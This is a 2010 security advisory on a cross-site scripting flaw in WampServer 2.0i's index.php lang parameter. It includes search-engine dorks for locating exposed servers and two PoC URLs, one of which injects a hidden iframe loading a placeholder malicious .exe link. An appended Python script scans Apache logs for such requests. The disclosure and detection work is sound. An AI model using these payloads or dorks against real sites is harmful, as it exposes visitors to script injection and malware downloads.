WampServer 2.0i (index.php) Remote Cross Site Scripting Vulnerability

2010-02-22 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS2: 4.3
Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
CVSS2 vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
AI Score: 5.9
Confidence: High
EPSS: 0.007
Percentile: 80.9%

Title: WampServer 2.0i (index.php) Remote Cross Site Scripting Vulnerability
Advisory ID: ZSL-2010-4926
Type: Remote
Impact: Cross-Site Scripting
Risk: (2/5)
Release Date: 22.02.2010

Summary

WampServer - Apache, PHP, MySQL on Windows.

Description

WampServer is susceptible to a cross-site scripting vulnerability. This issue is due to the application’s failure to properly sanitize user-supplied input. An attacker may leverage any of the cross-site scripting issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials, phishing, as well as other attacks.

Vendor

Romain Bourdon (Roms) - <http://www.wampserver.com>

Affected Version

2.0i

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

N/A

PoC

wamp_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://secunia.com/advisories/38706>
[2] <http://securityreason.com/exploitalert/7841>
[3] <http://www.securityfocus.com/bid/38357>
[4] <http://www.packetstormsecurity.org/filedesc/wamp-xss.txt.html>
[5] <http://osvdb.org/62481>
[6] <http://www.security-database.com/detail.php?alert=CVE-2010-0700>
[7] <http://olex.openlogic.com/wazi/2010/wampserver-2-0i-medium/>
[8] <http://en.securitylab.ru/nvd/391082.php>
[9] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0700>
[10] <http://securityreason.com/securityalert/7052>
[11] <http://xforce.iss.net/xforce/xfdb/56417>
[12] <http://www.net-security.org/vuln.php?id=11244>
[13] <http://www.us-cert.gov/cas/bulletins/SB10-060.html>
[14] <https://vulners.com/cve/CVE-2010-0700>

Changelog

[22.02.2010] - Initial release
[22.02.2010] - Added reference [1] and [2]
[23.02.2010] - Added reference [3], [4] and [5]
[26.02.2010] - Added reference [6], [7], [8] and [9]
[28.02.2010] - Added reference [10]
[03.03.2010] - Added reference [11], [12] and [13]
[25.10.2021] - Added reference [14]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

----------------------------------------------------------------

Title: WampServer 2.0i (index.php) Remote Cross Site Scripting Vulnerability

Summary: WampServer - Apache, PHP, MySQL on Windows
Product web page: http://www.wampserver.com
Current version: 2.0i

Vulnerability discovered by Gjoko "LiquidWorm" Krstic
Zero Science Lab - http://www.zeroscience.mk
liquidworm gmail com

26.01.2010

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4926.php

----------------------------------------------------------------

Dork:

	"WampServer - Donate - Anaska"
	"WAMPSERVER Homepage"


PoC:

	http://[site]/index.php?lang=%3Cscript%3Ealert%28%22ZSL%20Testingz%22%29%3C/script%3E
	http://[site]/index.php?lang=%3Ciframe%20height=%220%22%20width=%220%22%20frameborder=%220%22%20src=%22http://[evil .exe link]%22%3E%3C/iframe%3E


//EOF
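
One way to look for requests of the kind shown in the PoC in Apache access logs, as an added example that is not part of the original advisory: it flags index.php requests whose lang parameter, after repeated percent-decoding, is not a plain language code. The log lines are constructed samples, and the rule that legitimate lang values are short alphabetic codes is an assumption of this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: legitimate values of `lang` are short alphabetic codes such as "en".
SAFE_LANG = re.compile(r"^[A-Za-z]{2,10}$")
# Request part of an Apache common/combined log line: "METHOD target PROTOCOL"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_lang(line):
    """Return the decoded `lang` value if it is not a plain language code, else None."""
    match = REQUEST.search(line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    # Assumption: a bare directory request is also served by index.php.
    if not target.path.lower().endswith(("/", "index.php")):
        return None
    for raw in parse_qs(target.query, keep_blank_values=True).get("lang", []):
        value = fully_decode(raw)  # parse_qs has already decoded one level
        if not SAFE_LANG.match(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    checked = ((n, suspicious_lang(line)) for n, line in enumerate(lines, start=1))
    return [(n, value) for n, value in checked if value is not None]

# Constructed sample log lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Feb/2010:10:00:01 +0000] "GET /index.php?lang=en HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/Feb/2010:10:00:05 +0000] "GET /index.php?lang=%3Cscript%3Ealert%28%22ZSL%20Testingz%22%29%3C/script%3E HTTP/1.1" 200 5170',
    '198.51.100.7 - - [22/Feb/2010:10:00:09 +0000] "GET /index.php?lang=%253Ciframe%253E HTTP/1.1" 200 5150',
    '192.0.2.10 - - [22/Feb/2010:10:00:12 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: lang={value!r}")
```

The same allowlist applied server-side, before the value is echoed into the page, is the corresponding mitigation.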
